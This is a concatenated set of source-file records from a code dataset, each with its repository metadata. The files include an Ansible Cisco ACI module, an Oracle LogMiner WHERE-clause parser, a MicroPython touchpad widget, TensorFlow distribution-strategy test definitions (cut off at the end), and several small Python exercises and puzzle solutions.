] | permissive | PinarSiyah/NGStoolkit | 53ac6d87a572c498414a246ae051785b40fbc80d | b360da965c763de88c9453c4fd3d3eb7a61c935d | refs/heads/master | 2021-10-22T04:49:51.153970 | 2019-03-08T08:03:28 | 2019-03-08T08:03:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | #!/usr/bin/env python
import os
import sys
import bed
import generalUtils
import argparse
import random
parser = argparse.ArgumentParser(description='count strings')
parser.add_argument('-i', required= True, help='input')
parser.add_argument('-o', required= True, help='output')
parser.add_argument('-fasta', required= True, help='fasta reference')
parser.add_argument('-string', required= True, help='string to count')
args = parser.parse_args()
bedFile = args.i
output = args.o
fasta = args.fasta
string = args.string
bedObject = bed.bed(bedFile)
for bedline in bedObject.read():
count = bedline.countString(fasta, string)
fields = bedline.fields()
fields.append(str(count))
line = bedline.fields2line(fields)
out.write(line + '\n') | [
"[email protected]"
] | |
a570bfa4558c82748471c60e1e492652bbd4c4b6 | a66460a46611483dfbdc94c7996893f427e60d97 | /ansible/my_env/lib/python2.7/site-packages/ansible/modules/network/aci/aci_domain_to_vlan_pool.py | 41bc3c7d07d911e29c5a39ab423b1aaf06d43a9d | [
"MIT"
] | permissive | otus-devops-2019-02/yyashkin_infra | 06b57807dde26f94f501828c07503d6bf1d70816 | 0cd0c003884155ac922e3e301305ac202de7028c | refs/heads/master | 2020-04-29T02:42:22.056724 | 2019-05-15T16:24:35 | 2019-05-15T16:24:35 | 175,780,718 | 0 | 0 | MIT | 2019-05-15T16:24:36 | 2019-03-15T08:37:35 | HCL | UTF-8 | Python | false | false | 10,592 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Dag Wieers <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_domain_to_vlan_pool
short_description: Bind Domain to VLAN Pools (infra:RsVlanNs)
description:
- Bind Domain to VLAN Pools on Cisco ACI fabrics.
notes:
- The C(domain) and C(vlan_pool) parameters should exist before using this module.
The M(aci_domain) and M(aci_vlan_pool) can be used for these.
- More information about the internal APIC class B(infra:RsVlanNs) from
L(the APIC Management Information Model reference,https://developer.cisco.com/docs/apic-mim-ref/).
author:
- Dag Wieers (@dagwieers)
version_added: '2.5'
options:
domain:
description:
- Name of the domain being associated with the VLAN Pool.
aliases: [ domain_name, domain_profile ]
domain_type:
description:
- Determines if the Domain is physical (phys) or virtual (vmm).
choices: [ fc, l2dom, l3dom, phys, vmm ]
pool:
description:
- The name of the pool.
aliases: [ pool_name, vlan_pool ]
pool_allocation_mode:
description:
- The method used for allocating VLANs to resources.
choices: [ dynamic, static]
required: yes
aliases: [ allocation_mode, mode ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
vm_provider:
description:
- The VM platform for VMM Domains.
- Support for Kubernetes was added in ACI v3.0.
- Support for CloudFoundry, OpenShift and Red Hat was added in ACI v3.1.
choices: [ cloudfoundry, kubernetes, microsoft, openshift, openstack, redhat, vmware ]
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Bind a VMM domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: vmw_dom
domain_type: vmm
pool: vmw_pool
pool_allocation_mode: dynamic
vm_provider: vmware
state: present
delegate_to: localhost
- name: Remove a VMM domain to VLAN pool binding
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: vmw_dom
domain_type: vmm
pool: vmw_pool
pool_allocation_mode: dynamic
vm_provider: vmware
state: absent
delegate_to: localhost
- name: Bind a physical domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: present
delegate_to: localhost
- name: Bind a physical domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: absent
delegate_to: localhost
- name: Query an domain to VLAN pool binding
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: query
delegate_to: localhost
register: query_result
- name: Query all domain to VLAN pool bindings
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain_type: phys
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
VM_PROVIDER_MAPPING = dict(
cloudfoundry='CloudFoundry',
kubernetes='Kubernetes',
microsoft='Microsoft',
openshift='OpenShift',
openstack='OpenStack',
redhat='Redhat',
vmware='VMware',
)
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
domain=dict(type='str', aliases=['domain_name', 'domain_profile']), # Not required for querying all objects
domain_type=dict(type='str', required=True, choices=['fc', 'l2dom', 'l3dom', 'phys', 'vmm']), # Not required for querying all objects
pool=dict(type='str', aliases=['pool_name', 'vlan_pool']), # Not required for querying all objects
pool_allocation_mode=dict(type='str', required=True, aliases=['allocation_mode', 'mode'], choices=['dynamic', 'static']),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
vm_provider=dict(type='str', choices=['cloudfoundry', 'kubernetes', 'microsoft', 'openshift', 'openstack', 'redhat', 'vmware']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['domain_type', 'vmm', ['vm_provider']],
['state', 'absent', ['domain', 'domain_type', 'pool']],
['state', 'present', ['domain', 'domain_type', 'pool']],
],
)
domain = module.params['domain']
domain_type = module.params['domain_type']
pool = module.params['pool']
pool_allocation_mode = module.params['pool_allocation_mode']
vm_provider = module.params['vm_provider']
state = module.params['state']
# Report when vm_provider is set when type is not virtual
if domain_type != 'vmm' and vm_provider is not None:
module.fail_json(msg="Domain type '{0}' cannot have a 'vm_provider'".format(domain_type))
# ACI Pool URL requires the allocation mode for vlan and vsan pools (ex: uni/infra/vlanns-[poolname]-static)
pool_name = pool
if pool is not None:
pool_name = '[{0}]-{1}'.format(pool, pool_allocation_mode)
# Compile the full domain for URL building
if domain_type == 'fc':
domain_class = 'fcDomP'
domain_mo = 'uni/fc-{0}'.format(domain)
domain_rn = 'fc-{0}'.format(domain)
elif domain_type == 'l2dom':
domain_class = 'l2extDomP'
domain_mo = 'uni/l2dom-{0}'.format(domain)
domain_rn = 'l2dom-{0}'.format(domain)
elif domain_type == 'l3dom':
domain_class = 'l3extDomP'
domain_mo = 'uni/l3dom-{0}'.format(domain)
domain_rn = 'l3dom-{0}'.format(domain)
elif domain_type == 'phys':
domain_class = 'physDomP'
domain_mo = 'uni/phys-{0}'.format(domain)
domain_rn = 'phys-{0}'.format(domain)
elif domain_type == 'vmm':
domain_class = 'vmmDomP'
domain_mo = 'uni/vmmp-{0}/dom-{1}'.format(VM_PROVIDER_MAPPING[vm_provider], domain)
domain_rn = 'vmmp-{0}/dom-{1}'.format(VM_PROVIDER_MAPPING[vm_provider], domain)
# Ensure that querying all objects works when only domain_type is provided
if domain is None:
domain_mo = None
aci_mo = 'uni/infra/vlanns-{0}'.format(pool_name)
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class=domain_class,
aci_rn=domain_rn,
module_object=domain_mo,
target_filter={'name': domain},
),
child_classes=['infraRsVlanNs'],
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class=domain_class,
class_config=dict(name=domain),
child_configs=[
{'infraRsVlanNs': {'attributes': {'tDn': aci_mo}}},
]
)
aci.get_diff(aci_class=domain_class)
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
ffa90cad695dc1a89745ab2dd5a57a1006b45f38 | 3716e91c0a18a2cf0b5807cc673d95a7539b008c | /Forest/BackwoodsFork.py | f295233eb6d3ecd0680e498a956ebd483a4ff8fb | [] | no_license | kiwiapple87/CodeCombat-1 | 47f0fa6d75d6d3e9fb9c28feeb6fe2648664c1aa | ce0201e5ed099193ca40afd3b7abeee5a3732387 | refs/heads/master | 2021-05-01T16:38:03.575842 | 2016-08-25T11:13:26 | 2016-08-25T11:13:26 | 66,552,813 | 1 | 0 | null | 2016-08-25T11:39:20 | 2016-08-25T11:39:18 | null | UTF-8 | Python | false | false | 818 | py | # https://codecombat.com/play/level/backwoods-fork
# Incoming ogres!
# Use the checkAndAttack function to make your code easy to read.
# This function has a parameter.
# An parameter is a way of passing information into a function.
def checkAndAttack(target):
# The 'target' parameter is just a variable!
# It contains the argument when the function was called.
if target:
hero.attack(target)
hero.moveXY(43, 34)
while True:
hero.moveXY(58, 52)
topEnemy = hero.findNearestEnemy()
checkAndAttack(topEnemy)
hero.moveXY(58, 16)
topEnemy = hero.findNearestEnemy()
checkAndAttack(topEnemy)
# Move to the bottom X mark.
# Create a variable named bottomEnemy and find the nearest enemy.
# Use the checkAndAttack function, and include the bottomEnemy variable.
| [
"[email protected]"
] | |
e1dc4656c4add693f2dbb8e3c9a87990852101c8 | dccdb71dd75560ffeb076cedbd78b36e33b3adf2 | /EstruturaSequencial/ex02_numero.py | 5a2f85ce99f95f27163e7a478296cece3c9b0762 | [] | no_license | IngridFCosta/exerciciosPythonBrasil | 6fa669896cae135142101c522be7a919bda583b7 | 5c84d70f720b45a260320b08a5103bad5ce78339 | refs/heads/master | 2023-04-22T02:34:40.206350 | 2021-05-06T17:14:50 | 2021-05-06T17:14:50 | 291,265,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | """2-Faça um Programa que peça um número e então mostre a mensagem O número informado foi [número]."""
numero=int(input('Escreva um número: '))
print(f'O número informado foi {numero}') | [
"[email protected]"
] | |
a4d90d95aa7d47485090ac92009ccbef391cdfec | 5dfb9ca5e0c8cb4cb7a7a92d6f6a34b34a841869 | /LeetCodeSolutions/python/513_Find_Bottom_Left_Tree_Value.py | 808427669e6aa627ab9f1b0b0ec2c32986e01b6e | [
"MIT"
] | permissive | ChuanleiGuo/AlgorithmsPlayground | 2f71d29e697a656562e3d2a2de783d964dc6a325 | 90b6287b742c8bfd3797540c408d679be2821a40 | refs/heads/master | 2021-01-11T18:30:43.218959 | 2018-11-19T02:20:31 | 2018-11-19T02:20:31 | 79,550,052 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def findBottomLeftValue(self, root):
"""
:type root: TreeNode
:rtype: int
"""
queue = [root]
for node in queue:
queue += filter(None, [node.right, node.left])
return node.val
| [
"[email protected]"
] | |
77ff1c2b53c17c875b84bb4f6b5a2944e786527e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_207/ch136_2020_04_01_11_57_23_991207.py | d8760caf5639fb9f950467abccac43d652a78617 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,282 | py | import random
dinheiros = 10
d1 = random.randint(1,6)
d2 = random.randint(1,6)
d3 = random.randint(1,6)
soma = d1+d2+d3
print (soma)
JOGO = False
#fase de DICAS
print ("DICAS: \n Você possui {0} dinheiros." .format(dinheiros))
if dinheiros <=0:
print ("Você perdeu!")
pergunta1 = input("Você quer uma dica? ")
if pergunta1 == 'sim':
dinheiros -= 1
perguntaA = int(input ("Me diga um valor possível para a soma "))
perguntaB = int(input ("Me diga outro valor possível para a soma "))
perguntaC = int(input ("Me diga outro valor possível para a soma "))
if perguntaA == soma:
print ("Está entre os 3")
elif perguntaB == soma:
print ("Está entre os 3")
elif perguntaC == soma:
print ("Está entre os 3")
else:
print ("Não está entre os 3")
JOGO = True
while JOGO:
if dinheiros <=0:
print ("Você perdeu!")
JOGO = False
else:
print(" {0} dinheiros disponível" .format(dinheiros))
resposta = int(input ("Qual o valor da soma?"))
if resposta == soma:
dinheiros += 5*dinheiros
print ("Você ganhou o jogo com {0} dinheiros" .format (dinheiros))
JOGO = False
else:
dinheiros -= 1
| [
"[email protected]"
] | |
e3feca8063a41c8988af243eef5ea642b26fe9c5 | 4a74875c7366a19b7189fcb89fa0fa27abc4309e | /data_pipeline/processor/oracle_where_parser.py | 60562db03590c59c92acd5b85aa9bc775183f86c | [
"Apache-2.0"
] | permissive | saubury-iag/data_pipeline | d865d66d25eeb4ea6c6a655ae934bfe83c0efa06 | 4ad04198ed48c643045113c6e2c3e0848adbdec6 | refs/heads/master | 2021-07-23T08:43:46.754162 | 2017-11-01T05:05:23 | 2017-11-01T05:05:23 | 108,808,749 | 0 | 0 | null | 2017-10-30T06:06:41 | 2017-10-30T06:06:41 | null | UTF-8 | Python | false | false | 5,101 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: oracle_where_parser
# Purpose: Parses Where component of LogMiner SQL statements
#
# Notes:
#
###############################################################################
from enum import Enum
import data_pipeline.constants.const as const
from .oracle_base_parser import OracleBaseParser
WhereState = Enum('WhereState', 'start key operator value')
class OracleWhereParser(OracleBaseParser):
def __init__(self):
super(OracleWhereParser, self).__init__()
self._primarykey_list = None
self._curr_key = None
self._statement = None
def _set_primary_keys_from_string(self, pkstr, table_name):
pkstr = pkstr.strip()
if pkstr:
if pkstr == const.NO_KEYFIELD_STR:
self._primarykey_list = []
else:
self._primarykey_list = [pk.strip().upper()
for pk in pkstr.split(const.COMMA)]
self._logger.debug(
"[{table}] Set primary keys = {pks}"
.format(table=table_name, pks=self._primarykey_list))
return self._primarykey_list
def set_primary_keys(self, value):
self._primarykey_list = value
def set_statement(self, value):
self._statement = value
def parse(self):
self._char_buff = const.EMPTY_STRING
self._parsing_state = WhereState.start
while self._read_cursor < len(self._commit_statement):
if self._can_consume_char():
self._consume()
self._transition_where_parsing_state()
self._next()
def _can_consume_char(self):
return (self._parsing_state == WhereState.key or
self._parsing_state == WhereState.value)
def _transition_where_parsing_state(self):
if self._parsing_state == WhereState.start:
self._transition_from_where_start_parsing()
elif self._parsing_state == WhereState.key:
self._transition_from_where_key_parsing()
elif self._parsing_state == WhereState.operator:
self._transition_from_where_operator_parsing()
elif self._parsing_state == WhereState.value:
self._transition_from_where_value_parsing()
def _transition_from_where_start_parsing(self):
if self._at_key_word_boundary():
self._empty_buffer()
self._parsing_state = WhereState.key
def _transition_from_where_key_parsing(self):
if self._at_key_word_boundary():
self._curr_key = self._flush_buffer()
self._parsing_state = WhereState.operator
def _transition_from_where_operator_parsing(self):
is_null_index = self._commit_statement.find(const.IS_NULL,
self._read_cursor)
if self._read_cursor == is_null_index:
# Prefer using None over const.IS_NULL in case a
# key's value is actually 'IS NULL'
self._statement.add_condition(self._curr_key, None)
self._read_cursor += len(const.IS_NULL)
self._empty_buffer()
self._parsing_state = WhereState.start
elif self._at_value_word_boundary():
self._empty_buffer()
self._parsing_state = WhereState.value
def _transition_from_where_value_parsing(self):
if self._at_escaped_single_quote():
self._next()
elif self._at_value_word_boundary():
where_value = self._flush_buffer()
self._statement.add_condition(self._curr_key, where_value)
self._parsing_state = WhereState.start
def _can_add_primary_key(self):
return (self._primarykey_list is None or
const.NO_KEYFIELD_STR in self._primarykey_list or
self._curr_key.upper() in self._primarykey_list)
def _at_key_word_boundary(self):
return self._curr_char == const.DOUBLE_QUOTE
def _at_value_word_boundary(self):
return self._curr_char == const.SINGLE_QUOTE
def _flush_buffer(self):
# Always remove last char which is only useful when
# there are escaped single-quotes
return super(OracleWhereParser, self)._flush_buffer()[:-1]
| [
"[email protected]"
] | |
b15f2abae8cd733f498374b1a2d0c477cd073e9a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/482/usersdata/309/110136/submittedfiles/Av2_Parte4.py | 4caf25849b6aea491973c78fc097c44d88370f19 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | # -*- coding: utf-8 -*-
mt=[]
lin=int(input("Digite a quantidade de linhas da matriz:"))
colu=int(input("Digite a quantidade de colunas da matriz:"))
for i in range (lin,0,-1):
lista=[]
for j in range (colu,0,-1):
lista[j]=(int(input("Digite um elemento para sua matriz:")))
mt[i]=lista
print(mt)
| [
"[email protected]"
] | |
3a3a2bda3c9dc71fb5f213b93e4215892c92b19a | 354e2dede869a32e57c66c2e1b71bbd61d2cc36d | /widgets/pad.py | 17d2e11a21f2a29919b0d0f7268c7bfef1cc107d | [
"MIT"
] | permissive | hiddenvs/micropython_ra8875 | 5abf906d95c0c997ceb9638b8785c4cc2f803cf6 | a61314d62d6add831f6618c857b01d1a5b7ce388 | refs/heads/master | 2023-04-09T22:37:23.097440 | 2021-04-16T13:13:34 | 2021-04-16T13:13:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,750 | py | # pad.py Extension to lcd160gui providing the invisible touchpad class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 Peter Hinch
# Usage: import classes as required:
# from gui.widgets.pad import Pad
import uasyncio as asyncio
from micropython_ra8875.py.ugui import Touchable
from micropython_ra8875.primitives.delay_ms import Delay_ms
# Pad coordinates relate to bounding box (BB). x, y are of BB top left corner.
# likewise width and height refer to BB
class Pad(Touchable):
long_press_time = 1000
def __init__(self, location, *, height=20, width=50, onrelease=True,
callback=None, args=[], lp_callback=None, lp_args=[]):
super().__init__(location, None, height, width, None, None, None, None, False, '', None)
self.callback = (lambda *_: None) if callback is None else callback
self.callback_args = args
self.onrelease = onrelease
self.lp_callback = lp_callback
self.lp_args = lp_args
self.lp_task = None # Long press not in progress
def show(self):
pass
def _touched(self, x, y): # Process touch
if self.lp_callback is not None:
self.lp_task = asyncio.create_task(self.longpress())
if not self.onrelease:
self.callback(self, *self.callback_args) # Callback not a bound method so pass self
def _untouched(self):
if self.lp_task is not None:
self.lp_task.cancel()
self.lp_task = None
if self.onrelease:
self.callback(self, *self.callback_args) # Callback not a bound method so pass self
async def longpress(self):
await asyncio.sleep_ms(Pad.long_press_time)
self.lp_callback(self, *self.lp_args)
| [
"[email protected]"
] | |
b938e7c532cfe60e760b8a0b87abee91e54e4942 | 549f6aeee12b66189d6e30b448a656fe55bc3eca | /tensorflow/python/distribute/strategy_combinations.py | d66c7acba7776ce0478f7d6e7076a2bf5ddace66 | [
"Apache-2.0"
] | permissive | thomkallor/tensorflow | 2f6973b95a3fbaa41b6a4d03edb7ae665398865b | fb03bc60fe90d332e357aafa8359a44369ff8caf | refs/heads/master | 2022-11-10T20:25:03.224037 | 2020-06-26T23:39:44 | 2020-06-26T23:49:42 | 275,148,424 | 0 | 0 | Apache-2.0 | 2020-06-26T12:15:14 | 2020-06-26T12:15:13 | null | UTF-8 | Python | false | false | 16,830 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Strategy and optimizer combinations for combinations.combine()."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
from tensorflow.python import tf2
from tensorflow.python.distribute import central_storage_strategy
from tensorflow.python.distribute import cluster_resolver
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import mirrored_strategy as mirrored_lib
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import one_device_strategy as one_device_lib
from tensorflow.python.distribute import tpu_strategy as tpu_lib
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import context
from tensorflow.python.eager import remote
from tensorflow.python.framework import config
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_keras_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_keras_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_keras_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_keras_v2
from tensorflow.python.keras.optimizer_v2 import ftrl as ftrl_keras_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_keras_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_keras_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_keras_v2
from tensorflow.python.platform import flags
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu_strategy_util
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import ftrl
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import rmsprop
FLAGS = flags.FLAGS
_did_connect_to_cluster = False
# pylint: disable=missing-docstring
def _get_tpu_strategy_creator(steps_per_run,
use_single_core=False,
enable_packed_variable=False,
**kwargs):
def _create_tpu_strategy():
global _did_connect_to_cluster
try:
# Attempt to locally discover the TPU. This will fail for Cloud TPU, in
# which case we fall back to the values passed as flags.
resolver = tpu_cluster_resolver.TPUClusterResolver()
did_automatically_resolve = True
except ValueError:
did_automatically_resolve = False
# These flags will be defined by tpu_test_wrapper.py.
resolver = tpu_cluster_resolver.TPUClusterResolver(
tpu=hasattr(FLAGS, "tpu") and FLAGS.tpu or "",
zone=hasattr(FLAGS, "zone") and FLAGS.zone or None,
project=hasattr(FLAGS, "project") and FLAGS.project or None,
)
# Only connect once per process, rather than per test method.
if getattr(FLAGS, "tpu", "") or did_automatically_resolve:
if not _did_connect_to_cluster:
remote.connect_to_cluster(resolver)
_did_connect_to_cluster = True
topology = tpu_strategy_util.initialize_tpu_system(resolver)
device_assignment = None
if use_single_core:
device_assignment = device_assignment_lib.DeviceAssignment(
topology, core_assignment=device_assignment_lib.
SINGLE_CORE_ASSIGNMENT)
# Steps per run is only supported in TF 1.x
if tf2.enabled():
strategy = tpu_lib.TPUStrategy(resolver, device_assignment, **kwargs)
else:
strategy = tpu_lib.TPUStrategyV1(resolver, steps_per_run,
device_assignment, **kwargs)
strategy._enable_packed_variable_in_eager_mode = enable_packed_variable # pylint: disable=protected-access
return strategy
return _create_tpu_strategy
def _get_multi_worker_mirrored_creator(required_gpus):
def _create_multi_worker_mirrored():
tf_config = cluster_resolver.TFConfigClusterResolver()
resolver = cluster_resolver.SimpleClusterResolver(
cluster_spec=tf_config.cluster_spec(),
task_type=tf_config.task_type,
task_id=tf_config.task_id,
master=tf_config.master(),
environment=tf_config.environment,
num_accelerators={"GPU": required_gpus},
rpc_layer=tf_config.rpc_layer or "grpc",
)
# Always create the strategy in eager mode so that it starts the server and
# configures the eager context. The eager context can no longer be
# configured after initialization.
with context.eager_mode():
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy(
cluster_resolver=resolver)
# TODO(b/152320929): Wait for the cluster before proceeding, otherwise
# collectives may hang if any worker launches collectives before the chief
# creates the strategy.
try:
multi_process_runner.barrier().wait()
except ValueError:
# If the creator is called in the main process,
# multi_process_runner.barrier() raises ValueError, which is safe to
# ignore.
pass
return strategy
return _create_multi_worker_mirrored
# pylint: disable=g-long-lambda
default_strategy = combinations.NamedDistribution(
"Default",
distribution_strategy_context._get_default_strategy, # pylint: disable=protected-access
required_gpus=None)
one_device_strategy = combinations.NamedDistribution(
"OneDeviceCPU",
lambda: one_device_lib.OneDeviceStrategy("/cpu:0"),
required_gpus=None)
one_device_strategy_gpu = combinations.NamedDistribution(
"OneDeviceGPU",
lambda: one_device_lib.OneDeviceStrategy("/gpu:0"),
required_gpus=1)
one_device_strategy_on_worker_1 = combinations.NamedDistribution(
"OneDeviceOnWorker1CPU",
lambda: one_device_lib.OneDeviceStrategy("/job:worker/replica:0/task:1/cpu:0"), # pylint: disable=line-too-long
required_gpus=None)
one_device_strategy_gpu_on_worker_1 = combinations.NamedDistribution(
"OneDeviceOnWorker1GPU",
lambda: one_device_lib.OneDeviceStrategy("/job:worker/replica:0/task:1/gpu:0"), # pylint: disable=line-too-long
required_gpus=1)
tpu_strategy = combinations.NamedDistribution(
"TPU", _get_tpu_strategy_creator(steps_per_run=2), required_tpu=True)
tpu_strategy_packed_var = combinations.NamedDistribution(
"TPUPackedVar",
_get_tpu_strategy_creator(steps_per_run=2, enable_packed_variable=True),
required_tpu=True)
tpu_strategy_one_step = combinations.NamedDistribution(
"TPUOneStep", _get_tpu_strategy_creator(steps_per_run=1), required_tpu=True)
tpu_strategy_one_core = combinations.NamedDistribution(
"TPUOneCore",
_get_tpu_strategy_creator(steps_per_run=2, use_single_core=True),
required_tpu=True)
tpu_strategy_one_step_one_core = combinations.NamedDistribution(
"TPUOneStepOneCore",
_get_tpu_strategy_creator(steps_per_run=1, use_single_core=True),
required_tpu=True)
cloud_tpu_strategy = combinations.NamedDistribution(
"CloudTPU",
_get_tpu_strategy_creator(steps_per_run=2),
required_tpu=True,
use_cloud_tpu=True)
mirrored_strategy_with_one_cpu = combinations.NamedDistribution(
"Mirrored1CPU", lambda: mirrored_lib.MirroredStrategy(["/cpu:0"]))
mirrored_strategy_with_one_gpu = combinations.NamedDistribution(
"Mirrored1GPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0"]),
required_gpus=1)
mirrored_strategy_with_gpu_and_cpu = combinations.NamedDistribution(
"MirroredCPUAndGPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
mirrored_strategy_with_two_gpus = combinations.NamedDistribution(
"Mirrored2GPUs",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
# Should call set_virtual_cpus_to_at_least(3) in your test's setUp methods.
mirrored_strategy_with_cpu_1_and_2 = combinations.NamedDistribution(
"Mirrored2CPU", lambda: mirrored_lib.MirroredStrategy(["/cpu:1", "/cpu:2"]))
central_storage_strategy_with_two_gpus = combinations.NamedDistribution(
"CentralStorage2GPUs",
lambda: central_storage_strategy.CentralStorageStrategy._from_num_gpus(2), # pylint: disable=protected-access
required_gpus=2)
central_storage_strategy_with_gpu_and_cpu = combinations.NamedDistribution(
"CentralStorageCPUAndGPU",
lambda: central_storage_strategy.CentralStorageStrategy(
["/gpu:0", "/cpu:0"]),
required_gpus=1)
# chief + 1 worker, with CPU.
multi_worker_mirrored_2x1_cpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x1CPU",
_get_multi_worker_mirrored_creator(required_gpus=0),
has_chief=True,
num_workers=1,
)
# chief + 1 worker, with 1 GPU each.
multi_worker_mirrored_2x1_gpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x1GPU",
_get_multi_worker_mirrored_creator(required_gpus=1),
has_chief=True,
num_workers=1,
required_gpus=1,
)
# chief + 1 worker, with 2 GPU each.
